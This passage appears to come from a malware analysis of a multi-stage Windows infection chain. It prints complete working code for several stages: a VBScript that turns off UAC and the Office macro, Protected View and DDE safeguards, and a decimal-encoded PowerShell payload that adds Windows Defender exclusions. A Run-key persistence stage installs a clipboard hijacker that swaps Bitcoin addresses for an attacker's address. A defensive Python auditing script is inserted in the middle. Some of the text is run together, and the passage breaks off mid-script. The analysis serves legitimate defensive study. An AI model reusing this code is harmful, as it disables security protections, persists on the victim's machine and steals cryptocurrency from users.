End SubOn Error Resume NextConst HIDDEN_WINDOW = 0strComputer = “.”Set objWMIService = GetObject(“winmgmts:” & “{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2”)Set objStartup = objWMIService.Get(“Win32_ProcessStartup”)Set objConfig = objStartup.SpawnInstance_objConfig.ShowWindow = HIDDEN_WINDOWSet objProcess = GetObject(“winmgmts:root\cimv2:Win32_Process”)errReturn = objProcess.Create( “powershell $cici=@(36,117,115,101,114,80,97,116,104,32,61,32,36,101,110,118,58,85,83,69,82,80,82,79,70,73,76,69,10,36,112,97,116,104,69,120,99,108,117,115,105,111,110,115,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,67,111,108,108,101,99,116,105,111,110,115,46,65,114,114,97,121,76,105,115,116,10,36,112,114,111,99,101,115,115,69,120,99,108,117,115,105,111,110,115,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,67,111,108,108,101,99,116,105,111,110,115,46,65,114,114,97,121,76,105,115,116,10,36,112,97,116,104,69,120,99,108,117,115,105,111,110,115,46,65,100,100,40,39,67,58,92,39,41,32,62,32,36,110,117,108,108,10,36,112,114,111,99,101,115,115,69,120,99,108,117,115,105,111,110,115,46,65,100,100,40,39,77,115,98,117,105,108,100,46,101,120,101,39,41,32,62,32,36,110,117,108,108,10,36,112,114,111,99,101,115,115,69,120,99,108,117,115,105,111,110,115,46,65,100,100,40,39,67,97,108,99,46,101,120,101,39,41,32,62,32,36,110,117,108,108,10,36,112,114,111,99,101,115,115,69,120,99,108,117,115,105,111,110,115,46,65,100,100,40,39,112,111,119,101,114,115,104,101,108,108,46,101,120,101,39,41,32,62,32,36,110,117,108,108,10,36,112,114,111,99,101,115,115,69,120,99,108,117,115,105,111,110,115,46,65,100,100,40,39,119,115,99,114,105,112,116,46,101,120,101,39,41,32,62,32,36,110,117,108,108,10,36,112,114,111,99,101,115,115,69,120,99,108,117,115,105,111,110,115,46,65,100,100,40,39,109,115,104,116,97,46,101,120,101,39,41,32,62,32,36,110,117,108,108,10,36,112,114,111,99,101,115,115,69,120,99,108,117,115,105,111,110,115,46,65,100,100,40,39,99,109,10
0,46,101,120,101,39,41,32,62,32,36,110,117,108,108,10,36,112,114,111,106,101,99,116,115,70,111,108,100,101,114,32,61,32,39,100,58,92,39,10,65,100,100,45,77,112,80,114,101,102,101,114,101,110,99,101,32,45,69,120,99,108,117,115,105,111,110,80,97,116,104,32,36,112,114,111,106,101,99,116,115,70,111,108,100,101,114,10,102,111,114,101,97,99,104,32,40,36,101,120,99,108,117,115,105,111,110,32,105,110,32,36,112,97,116,104,69,120,99,108,117,115,105,111,110,115,41,32,10,123,10,32,32,32,32,87,114,105,116,101,45,72,111,115,116,32,34,65,100,100,105,110,103,32,80,97,116,104,32,69,120,99,108,117,115,105,111,110,58,32,34,32,36,101,120,99,108,117,115,105,111,110,10,32,32,32,32,65,100,100,45,77,112,80,114,101,102,101,114,101,110,99,101,32,45,69,120,99,108,117,115,105,111,110,80,97,116,104,32,36,101,120,99,108,117,115,105,111,110,10,125,10,102,111,114,101,97,99,104,32,40,36,101,120,99,108,117,115,105,111,110,32,105,110,32,36,112,114,111,99,101,115,115,69,120,99,108,117,115,105,111,110,115,41,10,123,10,32,32,32,32,87,114,105,116,101,45,72,111,115,116,32,34,65,100,100,105,110,103,32,80,114,111,99,101,115,115,32,69,120,99,108,117,115,105,111,110,58,32,34,32,36,101,120,99,108,117,115,105,111,110,10,32,32,32,32,65,100,100,45,77,112,80,114,101,102,101,114,101,110,99,101,32,45,69,120,99,108,117,115,105,111,110,80,114,111,99,101,115,115,32,36,101,120,99,108,117,115,105,111,110,10,125,10,87,114,105,116,101,45,72,111,115,116,32,34,34,10,87,114,105,116,101,45,72,111,115,116,32,34,89,111,117,114,32,69,120,99,108,117,115,105,111,110,115,58,34,10,36,112,114,101,102,115,32,61,32,71,101,116,45,77,112,80,114,101,102,101,114,101,110,99,101,10,36,112,114,101,102,115,46,69,120,99,108,117,115,105,111,110,80,97,116,104,10,36,112,114,101,102,115,46,69,120,99,108,117,115,105,111,110,80,114,111,99,101,115,115);[System.Text.Encoding]::ASCII.GetString($cici)|IEX”, null, objConfig, intProcessID)
CreateObject("WScript.Shell").RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA","0", "REG_DWORD"

Set wso = CreateObject("WScript.Shell")
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite
“HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Publisher\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Publisher\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Publisher\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Publisher\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Publisher\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Publisher\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Publisher\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Publisher\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, 
“REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Publisher\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Publisher\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Publisher\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Publisher\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Publisher\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Publisher\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Publisher\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Publisher\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Publisher\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Publisher\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Publisher\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Publisher\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Word\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Word\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Word\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Word\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Word\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\PowerPoint\Options\DontUpdateLinks”, 1, 
“REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\PowerPoint\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\PowerPoint\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\PowerPoint\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\PowerPoint\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Excel\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Excel\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Excel\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Excel\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Excel\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Word\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Word\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Word\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Word\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Word\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Excel\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Excel\Security\AllowDDE”, 1, 
“REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Excel\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Excel\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Excel\Security\AllowDDE”, 1, “REG_DWORD”

Code Snippet 5
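To triage a script like Code Snippet 5 quickly, the following Python example (added here, not part of the original analysis) parses the RegWrite calls out of the flattened VBScript, normalises the curly quotes left by extraction, and names the Office and UAC controls each write weakens. The sample text is a constructed handful of the snippet's statements, and the classification covers only VBAWarnings, Protected View, AllowDDE and EnableLUA.

```python
import re

# Map the curly quotes that copy-paste/extraction left in the snippet back to ASCII
# so the statements can be parsed as VBScript.
QUOTE_MAP = str.maketrans({'“': '"', '”': '"', '″': '"', '‘': "'", '’': "'"})

# One RegWrite call: RegWrite "key", value, "REG_TYPE"  (value quoted or bare;
# several calls may be run together on one line, as in the extracted snippet).
REGWRITE_RE = re.compile(
    r'RegWrite\s+"(?P<key>[^"]+)"\s*,\s*"?(?P<value>[^",]*?)"?\s*,\s*"(?P<type>REG_[A-Za-z_]+)"',
    re.IGNORECASE,
)

# Constructed sample in the shape of Code Snippet 5 (a handful of its statements).
SAMPLE = r'''
CreateObject(“WScript.Shell”).RegWrite “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA”,”0″, “REG_DWORD”
Set wso = CreateObject(“WScript.Shell”)wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Word\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Excel\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Word\Options\DontUpdateLinks”, 1, “REG_DWORD”
'''


def classify(key: str, value: str) -> str:
    """Name the security control a write weakens; anything unrecognised is reported as-is."""
    k = key.lower()
    if k.endswith(r'\policies\system\enablelua') and value == '0':
        return 'UAC disabled (EnableLUA=0)'
    if k.endswith(r'\security\vbawarnings') and value == '1':
        return 'all VBA macros run without warning (VBAWarnings=1)'
    if r'\security\protectedview\disable' in k and value == '1':
        return 'Protected View disabled (%s=1)' % key.rsplit('\\', 1)[1]
    if k.endswith(r'\security\allowdde') and value == '1':
        return 'DDE re-enabled (AllowDDE=1)'
    return 'other registry change'


def audit_regwrites(script: str) -> list:
    """Parse every RegWrite in a VBScript blob and tag the security-relevant ones."""
    findings = []
    for m in REGWRITE_RE.finditer(script.translate(QUOTE_MAP)):
        key, value = m.group('key'), m.group('value').strip()
        findings.append({'key': key, 'value': value, 'type': m.group('type').upper(),
                         'finding': classify(key, value)})
    return findings


def office_products(findings: list) -> set:
    """Which Office application/version pairs the script touches (e.g. 'Word 16.0')."""
    hits = set()
    for f in findings:
        m = re.search(r'\\Office\\(\d+\.\d+)\\([A-Za-z]+)\\', f['key'])
        if m:
            hits.add('%s %s' % (m.group(2), m.group(1)))
    return hits


if __name__ == '__main__':
    results = audit_regwrites(SAMPLE)
    for f in results:
        print('%-55s %s' % (f['finding'], f['key']))
    print('Office products affected:', sorted(office_products(results)))
```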

As seen in the code, a PowerShell command is hidden inside the variable named $cici as an array of decimal values, which is immediately converted back to the corresponding ASCII characters.

$userPath = $env:USERPROFILE
$pathExclusions = New-Object System.Collections.ArrayList
$processExclusions = New-Object System.Collections.ArrayList
$pathExclusions.Add('C:\') > $null
$processExclusions.Add('Msbuild.exe') > $null
$processExclusions.Add('Calc.exe') > $null
$processExclusions.Add('powershell.exe') > $null
$processExclusions.Add('wscript.exe') > $null
$processExclusions.Add('mshta.exe') > $null
$processExclusions.Add('cmd.exe') > $null
$projectsFolder = 'd:\'
Add-MpPreference -ExclusionPath $projectsFolder
foreach ($exclusion in $pathExclusions)
{
    Write-Host "Adding Path Exclusion: " $exclusion
    Add-MpPreference -ExclusionPath $exclusion
}
foreach ($exclusion in $processExclusions)
{
    Write-Host "Adding Process Exclusion: " $exclusion
    Add-MpPreference -ExclusionProcess $exclusion
}
Write-Host ""
Write-Host "Your Exclusions:"
$prefs = Get-MpPreference
$prefs.ExclusionPath
$prefs.ExclusionProcess

Code snippet 6

Code Snippet 6 is PowerShell code that adds the following processes to the Windows Defender (Microsoft Anti-Malware) exclusions: msbuild, calc, powershell, wscript, mshta and cmd; it also excludes the C:\ and d:\ paths from scanning.

Another script in this intricate chain is YL0je2fU:

<script language="&#86;&#66;&#83;&#99;&#114;&#105;&#112;&#116;">
CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\replcia", "mshta vbscript:Execute(""CreateObject(""""Wscript.Shell"""").Run """"powershell ((gp HKCU:\Software).mogale)|IEX"""", 0 : window.close"")", "REG_SZ"

CreateObject(“Wscript.Shell”).regwrite “HKCU\Software\mogale”, “$cici=@(102,117,110,99,116,105,111,110,32,105,115,66,105,116,99,111,105,110,65,100,100,114,101,115,115,40,91,115,116,114,105,110,103,93,36,99,108,105,112,98,111,97,114,100,67,111,110,116,101,110,116,41,10,123,10,9,105,102,40,36,99,108,105,112,98,111,97,114,100,67,111,110,116,101,110,116,91,48,93,32,45,110,101,32,39,49,39,41,10,9,123,10,9,9,114,101,116,117,114,110,32,36,102,97,108,115,101,10,9,125,10,10,9,36,115,116,114,76,101,110,103,116,104,32,61,32,36,99,108,105,112,98,111,97,114,100,67,111,110,116,101,110,116,46,108,101,110,103,116,104,10,9,105,102,40,36,115,116,114,76,101,110,103,116,104,32,45,108,116,32,50,54,32,45,111,114,32,36,115,116,114,76,101,110,103,116,104,32,45,103,116,32,51,53,41,10,9,123,10,9,9,114,101,116,117,114,110,32,36,102,97,108,115,101,10,9,125,10,10,9,36,118,97,108,105,100,82,101,103,101,120,32,61,32,39,94,91,97,45,122,65,45,90,48,45,57,92,115,93,43,36,39,10,9,105,102,40,36,99,108,105,112,98,111,97,114,100,67,111,110,116,101,110,116,32,45,99,110,111,116,109,97,116,99,104,32,36,118,97,108,105,100,82,101,103,101,120,41,10,9,123,10,9,9,114,101,116,117,114,110,32,36,102,97,108,115,101,10,9,125,10,10,9,114,101,116,117,114,110,32,36,116,114,117,101,10,125,10,36,98,105,116,99,111,105,110,65,100,100,114,101,115,115,101,115,32,61,32,40,34,49,57,107,67,99,100,98,116,116,84,65,88,49,109,76,85,51,72,107,57,83,50,66,87,53,99,75,76,70,68,49,122,49,87,34,44,32,34,49,57,107,67,99,100,98,116,116,84,65,88,49,109,76,85,51,72,107,57,83,50,66,87,53,99,75,76,70,68,49,122,49,87,34,44,32,34,49,57,107,67,99,100,98,116,116,84,65,88,49,109,76,85,51,72,107,57,83,50,66,87,53,99,75,76,70,68,49,122,49,87,34,44,32,34,49,57,107,67,99,100,98,116,116,84,65,88,49,109,76,85,51,72,107,57,83,50,66,87,53,99,75,76,70,68,49,122,49,87,34,44,32,34,49,57,107,67,99,100,98,116,116,84,65,88,49,109,76,85,51,72,107,57,83,50,66,87,53,99,75,76,70,68,49,122,49,87,34,41,10,36,98,105,116,99,111,105,110,65,100,100,114,101,115,115,101,1
15,83,105,122,101,32,61,32,36,98,105,116,99,111,105,110,65,100,100,114,101,115,115,101,115,46,108,101,110,103,116,104,10,36,105,32,61,32,48,10,36,111,108,100,65,100,100,114,101,115,115,83,101,116,32,61,32,34,34,10,119,104,105,108,101,40,49,41,10,123,10,9,36,99,108,105,112,98,111,97,114,100,67,111,110,116,101,110,116,32,61,32,71,101,116,45,67,108,105,112,98,111,97,114,100,10,9,105,102,40,40,105,115,66,105,116,99,111,105,110,65,100,100,114,101,115,115,40,36,99,108,105,112,98,111,97,114,100,67,111,110,116,101,110,116,41,41,32,45,99,101,113,32,36,116,114,117,101,32,45,97,110,100,10,9,9,36,99,108,105,112,98,111,97,114,100,67,111,110,116,101,110,116,32,45,99,110,101,32,36,111,108,100,65,100,100,114,101,115,115,83,101,116,41,10,9,123,10,9,9,83,101,116,45,67,108,105,112,98,111,97,114,100,32,36,98,105,116,99,111,105,110,65,100,100,114,101,115,115,101,115,91,36,105,93,10,9,9,36,111,108,100,65,100,100,114,101,115,115,83,101,116,32,61,32,36,98,105,116,99,111,105,110,65,100,100,114,101,115,115,101,115,91,36,105,93,10,9,9,36,105,32,61,32,40,36,105,32,43,32,49,41,32,37,32,36,98,105,116,99,111,105,110,65,100,100,114,101,115,115,101,115,83,105,122,101,10,9,125,10,125);[System.Text.Encoding]::ASCII.GetString($cici)|IEX” , “REG_SZ”
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")
errReturn = objProcess.Create( "powershell.exe ((gp HKCU:\Software).mogale)|IEX", null, objConfig, intProcessID)

Code Snippet 7

In this case too, a PowerShell script is embedded using the same variable name "$cici", but with the following body:

function isBitcoinAddress([string]$clipboardContent)
{
    if($clipboardContent[0] -ne '1')
    {
        return $false
    }

    $strLength = $clipboardContent.length
    if($strLength -lt 26 -or $strLength -gt 35)
    {
        return $false
    }

    $validRegex = '^[a-zA-Z0-9\s]+$'
    if($clipboardContent -cnotmatch $validRegex)
    {
        return $false
    }

    return $true
}
$bitcoinAddresses = ("19kCcdbttTAX1mLU3Hk9S2BW5cKLFD1z1W", "19kCcdbttTAX1mLU3Hk9S2BW5cKLFD1z1W", "19kCcdbttTAX1mLU3Hk9S2BW5cKLFD1z1W", "19kCcdbttTAX1mLU3Hk9S2BW5cKLFD1z1W", "19kCcdbttTAX1mLU3Hk9S2BW5cKLFD1z1W")
$bitcoinAddressesSize = $bitcoinAddresses.length
$i = 0
$oldAddressSet = ""
while(1)
{
    $clipboardContent = Get-Clipboard
    if((isBitcoinAddress($clipboardContent)) -ceq $true -and
        $clipboardContent -cne $oldAddressSet)
    {
        Set-Clipboard $bitcoinAddresses[$i]
        $oldAddressSet = $bitcoinAddresses[$i]
        $i = ($i + 1) % $bitcoinAddressesSize
    }
}

Code Snippet 8

The script continuously checks the clipboard of the victim machine for Bitcoin addresses and replaces any it finds with one of the hardcoded attacker addresses (the same address is repeated five times in the list). The last stage is UyFaSxgj:

<script language="&#86;&#66;&#83;&#99;&#114;&#105;&#112;&#116;">
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")
